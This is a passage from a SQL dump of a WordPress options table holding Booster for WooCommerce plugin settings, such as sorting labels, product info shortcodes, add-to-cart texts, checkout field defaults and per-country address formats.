Z','yes'),(411,'wcj_sorting_by_name_desc_text','Sort by title: Z to A','yes'),(412,'wcj_sorting_by_sku_asc_text','Sort by SKU: low to high','yes'),(413,'wcj_sorting_by_sku_desc_text','Sort by SKU: high to low','yes'),(414,'wcj_sorting_by_sku_num_enabled','no','yes'),(415,'wcj_sorting_by_stock_quantity_asc_text','Sort by stock quantity: low to high','yes'),(416,'wcj_sorting_by_stock_quantity_desc_text','Sort by stock quantity: high to low','yes'),(417,'wcj_product_custom_info_enabled','no','yes'),(418,'wcj_product_info_enabled','no','yes'),(419,'wcj_more_product_info_on_archive_enabled','no','yes'),(420,'wcj_more_product_info_on_archive_filter','woocommerce_after_shop_loop_item_title','yes'),(421,'wcj_more_product_info_on_archive_filter_priority','10','yes'),(422,'wcj_more_product_info_on_archive_fields_total','4','yes'),(423,'wcj_more_product_info_on_archive_1','<ul>','yes'),(424,'wcj_more_product_info_on_archive_2','<li>[wcj_product_you_save before=\"You save: <strong>\" hide_if_zero=\"yes\" after=\"</strong>\"][wcj_product_you_save_percent hide_if_zero=\"yes\" before=\" (\" after=\"%)\"]</li>','yes'),(425,'wcj_more_product_info_on_archive_3','<li>[wcj_product_total_sales before=\"Total sales: \"]</li>','yes'),(426,'wcj_more_product_info_on_archive_4','</ul>','yes'),(427,'wcj_more_product_info_on_single_enabled','no','yes'),(428,'wcj_more_product_info_on_single_filter','woocommerce_after_shop_loop_item_title','yes'),(429,'wcj_more_product_info_on_single_filter_priority','10','yes'),(430,'wcj_more_product_info_on_single_fields_total','4','yes'),(431,'wcj_more_product_info_on_single_1','<ul>','yes'),(432,'wcj_more_product_info_on_single_2','<li>[wcj_product_you_save before=\"You save: <strong>\" hide_if_zero=\"yes\" after=\"</strong>\"][wcj_product_you_save_percent hide_if_zero=\"yes\" before=\" (\" after=\"%)\"]</li>','yes'),(433,'wcj_more_product_info_on_single_3','<li>[wcj_product_total_sales before=\"Total sales: \"]</li>','yes'),(434,'wcj_more_product_info_on_single_4','</ul>','yes'),(435,'wcj_product_info_on_archive_enabled','no','yes'),(436,'wcj_product_info_on_archive','[wcj_product_sku before=\"SKU: \"]','yes'),(437,'wcj_product_info_on_archive_filter','woocommerce_after_shop_loop_item_title','yes'),(438,'wcj_product_info_on_archive_filter_priority','10','yes'),(439,'wcj_product_info_on_single_enabled','no','yes'),(440,'wcj_product_info_on_single','Total sales: [wcj_product_total_sales]','yes'),(441,'wcj_product_info_on_single_filter','woocommerce_after_single_product_summary','yes'),(442,'wcj_product_info_on_single_filter_priority','10','yes'),(443,'wcj_product_info_products_to_exclude','','yes'),(444,'wcj_product_add_to_cart_enabled','yes','yes'),(445,'wcj_add_to_cart_redirect_enabled','yes','yes'),(446,'wcj_add_to_cart_redirect_url','','yes'),(447,'wcj_add_to_cart_on_visit_enabled','no','yes'),(448,'wcj_related_products_enabled','no','yes'),(449,'wcj_product_info_related_products_num','3','yes'),(450,'wcj_product_info_related_products_columns','3','yes'),(451,'wcj_product_info_related_products_orderby','rand','yes'),(452,'wcj_product_info_related_products_order','desc','yes'),(453,'wcj_product_info_related_products_relate_by_category','yes','yes'),(454,'wcj_product_info_related_products_relate_by_tag','yes','yes'),(455,'wcj_product_info_related_products_hide','no','yes'),(456,'wcj_sku_enabled','no','yes'),(457,'wcj_sku_prefix','','yes'),(458,'wcj_sku_minimum_number_length','0','yes'),(459,'wcj_sku_suffix','','yes'),(460,'wcj_sku_variations_handling','as_variable','yes'),(461,'wcj_sku_prefix_cat_7','','yes'),(462,'wcj_sku_suffix_cat_7','','yes'),(463,'wcj_sku_prefix_cat_9','','yes'),(464,'wcj_sku_suffix_cat_9','','yes'),(465,'wcj_sku_prefix_cat_8','','yes'),(466,'wcj_sku_suffix_cat_8','','yes'),(467,'wcj_product_tabs_enabled','no','yes'),(468,'wcj_custom_product_tabs_global_total_number','1','yes'),(469,'wcj_custom_product_tabs_title_global_1','','yes'),(470,'wcj_custom_product_tabs_priority_global_1','40','yes'),(471,'wcj_custom_product_tabs_content_global_1','','yes'),(472,'wcj_custom_product_tabs_title_global_hide_in_product_ids_1','','yes'),(473,'wcj_custom_product_tabs_title_global_hide_in_cats_ids_1','','yes'),(474,'wcj_custom_product_tabs_title_global_show_in_product_ids_1','','yes'),(475,'wcj_custom_product_tabs_title_global_show_in_cats_ids_1','','yes'),(476,'wcj_custom_product_tabs_local_enabled','yes','yes'),(477,'wcj_custom_product_tabs_local_total_number_default','1','yes'),(478,'wcj_product_info_product_tabs_description_disable','no','yes'),(479,'wcj_product_info_product_tabs_description_priority','10','yes'),(480,'wcj_product_info_product_tabs_description_title','','yes'),(481,'wcj_product_info_product_tabs_additional_information_disable','no','yes'),(482,'wcj_product_info_product_tabs_additional_information_priority','20','yes'),(483,'wcj_product_info_product_tabs_additional_information_title','','yes'),(484,'wcj_product_info_product_tabs_reviews_disable','no','yes'),(485,'wcj_product_info_product_tabs_reviews_priority','30','yes'),(486,'wcj_product_info_product_tabs_reviews_title','','yes'),(487,'wcj_product_input_fields_enabled','no','yes'),(488,'wcj_product_input_fields_local_enabled','no','yes'),(489,'wcj_product_input_fields_local_total_number_default','1','yes'),(490,'wcj_product_input_fields_global_enabled','no','yes'),(491,'wcj_product_input_fields_global_total_number','1','yes'),(492,'wcj_product_input_fields_enabled_global_1','no','yes'),(493,'wcj_product_input_fields_type_global_1','text','yes'),(494,'wcj_product_input_fields_type_checkbox_yes_global_1','Yes','yes'),(495,'wcj_product_input_fields_type_checkbox_no_global_1','No','yes'),(496,'wcj_product_input_fields_type_checkbox_default_global_1','no','yes'),(497,'wcj_product_input_fields_type_file_accept_global_1','.jpg,.jpeg,.png','yes'),(498,'wcj_product_input_fields_type_datepicker_format_global_1','','yes'),(499,'wcj_product_input_fields_type_datepicker_mindate_global_1','-365','yes'),(500,'wcj_product_input_fields_type_datepicker_maxdate_global_1','365','yes'),(501,'wcj_product_input_fields_type_datepicker_firstday_global_1','0','yes'),(502,'wcj_product_input_fields_type_timepicker_format_global_1','hh:mm p','yes'),(503,'wcj_product_input_fields_type_timepicker_interval_global_1','15','yes'),(504,'wcj_product_input_fields_type_select_options_global_1','','yes'),(505,'wcj_product_input_fields_required_global_1','no','yes'),(506,'wcj_product_input_fields_title_global_1','','yes'),(507,'wcj_product_input_fields_placeholder_global_1','','yes'),(508,'wcj_product_input_fields_required_message_global_1','','yes'),(509,'wcj_product_input_fields_frontend_view_required_html','&nbsp;<abbr class=\"required\" title=\"required\">*</abbr>','yes'),(510,'wcj_product_input_fields_frontend_view_order_table_format','&nbsp;| %title% %value%','yes'),(511,'wcj_product_input_fields_make_nicer_name_enabled','yes','yes'),(512,'wcj_bulk_price_converter_enabled','no','yes'),(513,'wcj_purchase_data_enabled','no','yes'),(514,'wcj_purchase_data_custom_columns_profit','yes','yes'),(515,'wcj_crowdfunding_enabled','no','yes'),(516,'wcj_wholesale_price_enabled','no','yes'),(517,'wcj_wholesale_price_use_total_cart_quantity','no','yes'),(518,'wcj_wholesale_price_apply_only_if_no_other_discounts','no','yes'),(519,'wcj_wholesale_price_show_info_on_cart','no','yes'),(520,'wcj_wholesale_price_show_info_on_cart_format','<del>%old_price%</del> %price%<br>You save: <span style=\"color:red;\">%discount_value%%</span>','yes'),(521,'wcj_wholesale_price_discount_type','percent','yes'),(522,'wcj_wholesale_price_products_to_include','','yes'),(523,'wcj_wholesale_price_levels_number','1','yes'),(524,'wcj_wholesale_price_level_min_qty_1','0','yes'),(525,'wcj_wholesale_price_level_discount_percent_1','0','yes'),(526,'wcj_product_images_enabled','no','yes'),(527,'wcj_product_images_and_thumbnails_enabled','no','yes'),(528,'wcj_product_images_and_thumbnails_hide_on_single','no','yes'),(529,'wcj_product_images_custom_on_single','','yes'),(530,'wcj_product_images_thumbnails_custom_on_single','','yes'),(531,'wcj_product_images_hide_on_single','no','yes'),(532,'wcj_product_images_thumbnails_hide_on_single','no','yes'),(533,'wcj_product_images_custom_on_archives','','yes'),(534,'wcj_product_images_hide_on_archive','no','yes'),(535,'wcj_product_images_thumbnails_columns','3','yes'),(536,'wcj_product_images_sale_flash_enabled','no','yes'),(537,'wcj_product_images_sale_flash_html','<span class=\"onsale\">Sale!</span>','yes'),(538,'wcj_product_images_sale_flash_hide_on_archives','no','yes'),(539,'wcj_product_images_sale_flash_hide_on_single','no','yes'),(540,'wcj_add_to_cart_enabled','no','yes'),(541,'wcj_add_to_cart_per_category_enabled','yes','yes'),(542,'wcj_add_to_cart_per_category_total_groups_number','1','yes'),(543,'wcj_add_to_cart_per_category_enabled_group_1','yes','yes'),(544,'wcj_add_to_cart_per_category_ids_group_1','','yes'),(545,'wcj_add_to_cart_per_category_text_single_group_1','','yes'),(546,'wcj_add_to_cart_per_category_text_archive_group_1','','yes'),(547,'wcj_add_to_cart_per_product_enabled','yes','yes'),(548,'wcj_add_to_cart_text_enabled','no','yes'),(549,'wcj_add_to_cart_text_on_single_simple','Add to cart','yes'),(550,'wcj_add_to_cart_text_on_archives_simple','Add to cart','yes'),(551,'wcj_add_to_cart_text_on_single_zero_price_simple','Add to cart','yes'),(552,'wcj_add_to_cart_text_on_archives_zero_price_simple','Add to cart','yes'),(553,'wcj_add_to_cart_text_on_archives_no_price_simple','Read More','yes'),(554,'wcj_add_to_cart_text_on_single_in_cart_simple','Add to cart','yes'),(555,'wcj_add_to_cart_text_on_archives_in_cart_simple','Add to cart','yes'),(556,'wcj_add_to_cart_text_on_single_variable','Select options','yes'),(557,'wcj_add_to_cart_text_on_archives_variable','Select options','yes'),(558,'wcj_add_to_cart_text_on_single_in_cart_variable','Add to cart','yes'),(559,'wcj_add_to_cart_text_on_archives_in_cart_variable','Add to cart','yes'),(560,'wcj_add_to_cart_text_on_single_external','Buy product','yes'),(561,'wcj_add_to_cart_text_on_archives_external','Buy product','yes'),(562,'wcj_add_to_cart_text_on_single_zero_price_external','Add to cart','yes'),(563,'wcj_add_to_cart_text_on_archives_zero_price_external','Add to cart','yes'),(564,'wcj_add_to_cart_text_on_archives_no_price_external','Read More','yes'),(565,'wcj_add_to_cart_text_on_single_grouped','View products','yes'),(566,'wcj_add_to_cart_text_on_archives_grouped','View products','yes'),(567,'wcj_add_to_cart_text_on_single_zero_price_grouped','Add to cart','yes'),(568,'wcj_add_to_cart_text_on_archives_zero_price_grouped','Add to cart','yes'),(569,'wcj_add_to_cart_text_on_archives_no_price_grouped','Read More','yes'),(570,'wcj_add_to_cart_text_on_single_in_cart_grouped','Add to cart','yes'),(571,'wcj_add_to_cart_text_on_archives_in_cart_grouped','Add to cart','yes'),(572,'wcj_add_to_cart_text_on_single_other','Read more','yes'),(573,'wcj_add_to_cart_text_on_archives_other','Read more','yes'),(574,'wcj_add_to_cart_text_on_single_zero_price_other','Add to cart','yes'),(575,'wcj_add_to_cart_text_on_archives_zero_price_other','Add to cart','yes'),(576,'wcj_add_to_cart_text_on_archives_no_price_other','Read More','yes'),(577,'wcj_add_to_cart_text_on_single_in_cart_other','Add to cart','yes'),(578,'wcj_add_to_cart_text_on_archives_in_cart_other','Add to cart','yes'),(579,'wcj_more_button_labels_enabled','no','yes'),(580,'wcj_checkout_place_order_button_text','','yes'),(581,'wcj_cart_enabled','no','yes'),(582,'wcj_cart_custom_info_total_number','1','yes'),(583,'wcj_cart_custom_info_content_1','[wcj_cart_items_total_weight before=\"Total weight: \" after=\" kg\"]','yes'),(584,'wcj_cart_custom_info_hook_1','woocommerce_after_cart_totals','yes'),(585,'wcj_cart_custom_info_priority_1','10','yes'),(586,'wcj_cart_custom_info_item','','yes'),(587,'wcj_empty_cart_enabled','no','yes'),(588,'wcj_empty_cart_text','Empty Cart','yes'),(589,'wcj_empty_cart_div_style','float: right;','yes'),(590,'wcj_empty_cart_position','woocommerce_after_cart','yes'),(591,'wcj_empty_cart_confirmation','no_confirmation','yes'),(592,'wcj_empty_cart_confirmation_text','Are you sure?','yes'),(593,'wcj_mini_cart_enabled','no','yes'),(594,'wcj_mini_cart_custom_info_total_number','1','yes'),(595,'wcj_mini_cart_custom_info_content_1','[wcj_cart_items_total_weight before=\"Total weight: \" after=\" kg\"]','yes'),(596,'wcj_mini_cart_custom_info_hook_1','woocommerce_after_mini_cart','yes'),(597,'wcj_mini_cart_custom_info_priority_1','10','yes'),(598,'wcj_checkout_core_fields_enabled','no','yes'),(599,'wcj_checkout_fields_billing_country_is_enabled','default','yes'),(600,'wcj_checkout_fields_billing_country_is_required','default','yes'),(601,'wcj_checkout_fields_billing_country_label','','yes'),(602,'wcj_checkout_fields_billing_country_placeholder','','yes'),(603,'wcj_checkout_fields_billing_country_class','default','yes'),(604,'wcj_checkout_fields_billing_first_name_is_enabled','default','yes'),(605,'wcj_checkout_fields_billing_first_name_is_required','default','yes'),(606,'wcj_checkout_fields_billing_first_name_label','','yes'),(607,'wcj_checkout_fields_billing_first_name_placeholder','','yes'),(608,'wcj_checkout_fields_billing_first_name_class','default','yes'),(609,'wcj_checkout_fields_billing_last_name_is_enabled','default','yes'),(610,'wcj_checkout_fields_billing_last_name_is_required','default','yes'),(611,'wcj_checkout_fields_billing_last_name_label','','yes'),(612,'wcj_checkout_fields_billing_last_name_placeholder','','yes'),(613,'wcj_checkout_fields_billing_last_name_class','default','yes'),(614,'wcj_checkout_fields_billing_company_is_enabled','default','yes'),(615,'wcj_checkout_fields_billing_company_is_required','default','yes'),(616,'wcj_checkout_fields_billing_company_label','','yes'),(617,'wcj_checkout_fields_billing_company_placeholder','','yes'),(618,'wcj_checkout_fields_billing_company_class','default','yes'),(619,'wcj_checkout_fields_billing_address_1_is_enabled','default','yes'),(620,'wcj_checkout_fields_billing_address_1_is_required','default','yes'),(621,'wcj_checkout_fields_billing_address_1_label','','yes'),(622,'wcj_checkout_fields_billing_address_1_placeholder','','yes'),(623,'wcj_checkout_fields_billing_address_1_class','default','yes'),(624,'wcj_checkout_fields_billing_address_2_is_enabled','default','yes'),(625,'wcj_checkout_fields_billing_address_2_is_required','default','yes'),(626,'wcj_checkout_fields_billing_address_2_label','','yes'),(627,'wcj_checkout_fields_billing_address_2_placeholder','','yes'),(628,'wcj_checkout_fields_billing_address_2_class','default','yes'),(629,'wcj_checkout_fields_billing_city_is_enabled','default','yes'),(630,'wcj_checkout_fields_billing_city_is_required','default','yes'),(631,'wcj_checkout_fields_billing_city_label','','yes'),(632,'wcj_checkout_fields_billing_city_placeholder','','yes'),(633,'wcj_checkout_fields_billing_city_class','default','yes'),(634,'wcj_checkout_fields_billing_state_is_enabled','default','yes'),(635,'wcj_checkout_fields_billing_state_is_required','default','yes'),(636,'wcj_checkout_fields_billing_state_label','','yes'),(637,'wcj_checkout_fields_billing_state_placeholder','','yes'),(638,'wcj_checkout_fields_billing_state_class','default','yes'),(639,'wcj_checkout_fields_billing_postcode_is_enabled','default','yes'),(640,'wcj_checkout_fields_billing_postcode_is_required','default','yes'),(641,'wcj_checkout_fields_billing_postcode_label','','yes'),(642,'wcj_checkout_fields_billing_postcode_placeholder','','yes'),(643,'wcj_checkout_fields_billing_postcode_class','default','yes'),(644,'wcj_checkout_fields_billing_email_is_enabled','default','yes'),(645,'wcj_checkout_fields_billing_email_is_required','default','yes'),(646,'wcj_checkout_fields_billing_email_label','','yes'),(647,'wcj_checkout_fields_billing_email_placeholder','','yes'),(648,'wcj_checkout_fields_billing_email_class','default','yes'),(649,'wcj_checkout_fields_billing_phone_is_enabled','default','yes'),(650,'wcj_checkout_fields_billing_phone_is_required','default','yes'),(651,'wcj_checkout_fields_billing_phone_label','','yes'),(652,'wcj_checkout_fields_billing_phone_placeholder','','yes'),(653,'wcj_checkout_fields_billing_phone_class','default','yes'),(654,'wcj_checkout_fields_shipping_country_is_enabled','default','yes'),(655,'wcj_checkout_fields_shipping_country_is_required','default','yes'),(656,'wcj_checkout_fields_shipping_country_label','','yes'),(657,'wcj_checkout_fields_shipping_country_placeholder','','yes'),(658,'wcj_checkout_fields_shipping_country_class','default','yes'),(659,'wcj_checkout_fields_shipping_first_name_is_enabled','default','yes'),(660,'wcj_checkout_fields_shipping_first_name_is_required','default','yes'),(661,'wcj_checkout_fields_shipping_first_name_label','','yes'),(662,'wcj_checkout_fields_shipping_first_name_placeholder','','yes'),(663,'wcj_checkout_fields_shipping_first_name_class','default','yes'),(664,'wcj_checkout_fields_shipping_last_name_is_enabled','default','yes'),(665,'wcj_checkout_fields_shipping_last_name_is_required','default','yes'),(666,'wcj_checkout_fields_shipping_last_name_label','','yes'),(667,'wcj_checkout_fields_shipping_last_name_placeholder','','yes'),(668,'wcj_checkout_fields_shipping_last_name_class','default','yes'),(669,'wcj_checkout_fields_shipping_company_is_enabled','default','yes'),(670,'wcj_checkout_fields_shipping_company_is_required','default','yes'),(671,'wcj_checkout_fields_shipping_company_label','','yes'),(672,'wcj_checkout_fields_shipping_company_placeholder','','yes'),(673,'wcj_checkout_fields_shipping_company_class','default','yes'),(674,'wcj_checkout_fields_shipping_address_1_is_enabled','default','yes'),(675,'wcj_checkout_fields_shipping_address_1_is_required','default','yes'),(676,'wcj_checkout_fields_shipping_address_1_label','','yes'),(677,'wcj_checkout_fields_shipping_address_1_placeholder','','yes'),(678,'wcj_checkout_fields_shipping_address_1_class','default','yes'),(679,'wcj_checkout_fields_shipping_address_2_is_enabled','default','yes'),(680,'wcj_checkout_fields_shipping_address_2_is_required','default','yes'),(681,'wcj_checkout_fields_shipping_address_2_label','','yes'),(682,'wcj_checkout_fields_shipping_address_2_placeholder','','yes'),(683,'wcj_checkout_fields_shipping_address_2_class','default','yes'),(684,'wcj_checkout_fields_shipping_city_is_enabled','default','yes'),(685,'wcj_checkout_fields_shipping_city_is_required','default','yes'),(686,'wcj_checkout_fields_shipping_city_label','','yes'),(687,'wcj_checkout_fields_shipping_city_placeholder','','yes'),(688,'wcj_checkout_fields_shipping_city_class','default','yes'),(689,'wcj_checkout_fields_shipping_state_is_enabled','default','yes'),(690,'wcj_checkout_fields_shipping_state_is_required','default','yes'),(691,'wcj_checkout_fields_shipping_state_label','','yes'),(692,'wcj_checkout_fields_shipping_state_placeholder','','yes'),(693,'wcj_checkout_fields_shipping_state_class','default','yes'),(694,'wcj_checkout_fields_shipping_postcode_is_enabled','default','yes'),(695,'wcj_checkout_fields_shipping_postcode_is_required','default','yes'),(696,'wcj_checkout_fields_shipping_postcode_label','','yes'),(697,'wcj_checkout_fields_shipping_postcode_placeholder','','yes'),(698,'wcj_checkout_fields_shipping_postcode_class','default','yes'),(699,'wcj_checkout_fields_account_password_is_enabled','default','yes'),(700,'wcj_checkout_fields_account_password_is_required','default','yes'),(701,'wcj_checkout_fields_account_password_label','','yes'),(702,'wcj_checkout_fields_account_password_placeholder','','yes'),(703,'wcj_checkout_fields_account_password_class','default','yes'),(704,'wcj_checkout_fields_order_comments_is_enabled','default','yes'),(705,'wcj_checkout_fields_order_comments_is_required','default','yes'),(706,'wcj_checkout_fields_order_comments_label','','yes'),(707,'wcj_checkout_fields_order_comments_placeholder','','yes'),(708,'wcj_checkout_fields_order_comments_class','default','yes'),(709,'wcj_checkout_custom_fields_enabled','no','yes'),(710,'wcj_checkout_custom_fields_email_all_to_admin','yes','yes'),(711,'wcj_checkout_custom_fields_email_all_to_customer','yes','yes'),(712,'wcj_checkout_custom_fields_total_number','1','yes'),(713,'wcj_checkout_custom_field_enabled_1','no','yes'),(714,'wcj_checkout_custom_field_type_1','text','yes'),(715,'wcj_checkout_custom_field_select_options_1','','yes'),(716,'wcj_checkout_custom_field_checkbox_yes_1','Yes','yes'),(717,'wcj_checkout_custom_field_checkbox_no_1','No','yes'),(718,'wcj_checkout_custom_field_checkbox_default_1','no','yes'),(719,'wcj_checkout_custom_field_datepicker_format_1','','yes'),(720,'wcj_checkout_custom_field_datepicker_mindate_1','-365','yes'),(721,'wcj_checkout_custom_field_datepicker_maxdate_1','365','yes'),(722,'wcj_checkout_custom_field_datepicker_firstday_1','0','yes'),(723,'wcj_checkout_custom_field_timepicker_format_1','hh:mm p','yes'),(724,'wcj_checkout_custom_field_timepicker_interval_1','15','yes'),(725,'wcj_checkout_custom_field_required_1','no','yes'),(726,'wcj_checkout_custom_field_label_1','','yes'),(727,'wcj_checkout_custom_field_placeholder_1','','yes'),(728,'wcj_checkout_custom_field_section_1','billing','yes'),(729,'wcj_checkout_custom_field_class_1','form-row-wide','yes'),(730,'wcj_checkout_custom_field_clear_1','yes','yes'),(731,'wcj_checkout_custom_field_categories_in_1','','yes'),(732,'wcj_checkout_custom_info_enabled','no','yes'),(733,'wcj_checkout_custom_info_total_number','1','yes'),(734,'wcj_checkout_custom_info_content_1','[wcj_cart_items_total_weight before=\"Total weight: \" after=\" kg\"]','yes'),(735,'wcj_checkout_custom_info_hook_1','woocommerce_checkout_after_order_review','yes'),(736,'wcj_checkout_custom_info_priority_1','10','yes'),(737,'wcj_payment_gateways_enabled','no','yes'),(738,'wcj_custom_payment_gateways_number','1','yes'),(739,'wcj_payment_gateways_icons_enabled','no','yes'),(740,'wcj_payment_gateways_fees_enabled','no','yes'),(741,'wcj_payment_gateways_per_category_enabled','no','yes'),(742,'wcj_payment_gateways_currency_enabled','no','yes'),(743,'wcj_payment_gateways_min_max_enabled','no','yes'),(744,'wcj_payment_gateways_by_country_enabled','no','yes'),(745,'wcj_shipping_enabled','no','yes'),(746,'wcj_shipping_hide_if_free_available_local_delivery','no','yes'),(747,'wcj_shipping_hide_if_free_available_all','no','yes'),(748,'wcj_shipping_calculator_enabled','no','yes'),(749,'wcj_shipping_calculator_enable_city','no','yes'),(750,'wcj_shipping_calculator_enable_postcode','yes','yes'),(751,'wcj_shipping_calculator_enable_state','yes','yes'),(752,'wcj_shipping_calculator_enable_force_block_open','no','yes'),(753,'wcj_shipping_calculator_enable_force_block_open_button','hide','yes'),(754,'wcj_address_formats_enabled','no','yes'),(755,'wcj_address_formats_force_country_display','no','yes'),(756,'wcj_address_formats_country_AD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(757,'wcj_address_formats_country_AE','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(758,'wcj_address_formats_country_AF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(759,'wcj_address_formats_country_AG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(760,'wcj_address_formats_country_AI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(761,'wcj_address_formats_country_AL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(762,'wcj_address_formats_country_AM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(763,'wcj_address_formats_country_AN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(764,'wcj_address_formats_country_AO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(765,'wcj_address_formats_country_AQ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(766,'wcj_address_formats_country_AR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(767,'wcj_address_formats_country_AT','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(768,'wcj_address_formats_country_AU','{name}\n{company}\n{address_1}\n{address_2}\n{city} {state} {postcode}\n{country}','yes'),(769,'wcj_address_formats_country_AW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(770,'wcj_address_formats_country_AX','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(771,'wcj_address_formats_country_AZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(772,'wcj_address_formats_country_BA','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(773,'wcj_address_formats_country_BB','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(774,'wcj_address_formats_country_BD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(775,'wcj_address_formats_country_BE','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(776,'wcj_address_formats_country_BF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(777,'wcj_address_formats_country_BG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(778,'wcj_address_formats_country_BH','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(779,'wcj_address_formats_country_BI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(780,'wcj_address_formats_country_BJ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(781,'wcj_address_formats_country_BL','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(782,'wcj_address_formats_country_BM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(783,'wcj_address_formats_country_BN','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(784,'wcj_address_formats_country_BO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(785,'wcj_address_formats_country_BQ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(786,'wcj_address_formats_country_BR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(787,'wcj_address_formats_country_BS','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(788,'wcj_address_formats_country_BT','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(789,'wcj_address_formats_country_BV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(790,'wcj_address_formats_country_BW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(791,'wcj_address_formats_country_BY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(792,'wcj_address_formats_country_BZ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(793,'wcj_address_formats_country_CA','{company}\n{name}\n{address_1}\n{address_2}\n{city} {state} {postcode}\n{country}','yes'),(794,'wcj_address_formats_country_CC','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(795,'wcj_address_formats_country_CD','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(796,'wcj_address_formats_country_CF','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(797,'wcj_address_formats_country_CG','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(798,'wcj_address_formats_country_CH','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(799,'wcj_address_formats_country_CI','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(800,'wcj_address_formats_country_CK','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(801,'wcj_address_formats_country_CL','{company}\n{name}\n{address_1}\n{address_2}\n{state}\n{postcode} {city}\n{country}','yes'),(802,'wcj_address_formats_country_CM','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(803,'wcj_address_formats_country_CN','{country} {postcode}\n{state}, {city}, {address_2}, {address_1}\n{company}\n{name}','yes'),(804,'wcj_address_formats_country_CO','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(805,'wcj_address_formats_country_CR','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(806,'wcj_address_formats_country_CU','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(807,'wcj_address_formats_country_CV','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(808,'wcj_address_formats_country_CW','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(809,'wcj_address_formats_country_CX','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(810,'wcj_address_formats_country_CY','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(811,'wcj_address_formats_country_CZ','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(812,'wcj_address_formats_country_DE','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} {city}\n{country}','yes'),(813,'wcj_address_formats_country_DJ','{name}\n{company}\n{address_1}\n{address_2}\n{city}\n{state}\n{postcode}\n{country}','yes'),(814,'wcj_address_formats_country_DK','{company}\n{name}\n{address_1}\n{address_2}\n{postcode} 